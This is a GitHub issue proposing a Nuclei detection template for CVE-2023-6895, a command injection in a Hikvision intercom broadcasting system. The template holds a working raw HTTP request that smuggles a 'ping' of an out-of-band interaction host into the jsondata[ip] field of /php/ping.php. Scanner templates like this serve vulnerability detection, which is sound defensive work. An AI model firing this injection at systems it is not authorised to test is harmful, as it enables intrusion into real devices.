### ISSUE TITLE
CVE-2023-6895.yaml

### ISSUE THREAD

**Issue by Archerber** [projectdiscovery/nuclei-templates#9168]
### Refer
https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py

### Nuclei Template:

```yaml
id: CVE-2023-6895

info:
  name: Hikvision Intercom Broadcasting System - Command execution vulnerability
  author: archer
  severity: critical
  description: |
    Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
  reference:
    - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
  metadata:
    verified: true
    max-request: 2
    fofa-query: app:"TL-SC4171G"
  tags: hikvision,broadsystem,rce

http:
  - raw:
      - |
        POST /php/ping.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
    
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```
